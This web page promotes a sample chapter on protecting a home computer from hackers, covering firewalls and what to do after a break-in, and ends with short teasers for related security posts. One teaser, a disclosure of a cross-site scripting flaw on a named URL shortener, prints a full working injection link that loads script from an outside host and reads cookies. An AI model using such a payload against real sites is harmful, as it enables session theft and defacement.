If your computer is a fortress, hackers are the interlopers with pointy metal hats who charge the gate, scale the walls, or use stolen keys to get inside. Their mission? To steal your crown jewels or carve graffiti on the walls, such as “The king is a weenie.” In this sample chapter Andy Walker tells you why they want access to your computer, how they try to gain access to it, and what you stand to lose if they do. There’s also a really exciting section on how to stop them and what to do if one of them succeeds. It’s like a medieval video game, but scarily, it’s real.

In this chapter

* What Is a Hacker?
* When Is a Hacker a Cracker?
* How Do Hackers Sneak into Your Computer?
* What Damage Can Hackers Do?
* What Is a Software Firewall?
* Is the Windows Firewall Any Good?
* Is a Hardware Firewall Better?
* I’m Under Attack! What to Do If You’ve Been Hacked and Cracked
* Batten down the Hatches—10-Minute Anti-Hacker Tactics
* Wall off the World—Blockade Your Computer in an Afternoon

Explore More

Secure Sockets Layer (SSL) Protocol – How it works?

Ever noticed the “https:” in the URL on your address bar and the small padlock which docks itself nicely at the bottom of your window? Well, if the answer is

critical XSS Vulnerability on Ygncos Shorten Url

PlanetCreator has reported another critical XSS Vulnerability on Ygncos Shorten Url : http://www.ygn.me This vulnerability has been informed to :- webmaster Test Link http://shorten.ygn.me/index.php?url=%27%22%3E%3C%2Ftitle%3E%3Cscript%20src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+PlanetCreator%3C%2Fh1%3E%3C%2Fmarquee%3E Cross-site scripting (XSS) is a type

Finding 0days in Web Applications

Most zero-day exploits in web applications are usually easier to find, study, and attack than actual services like a webserver due to the fact that a hacker does not need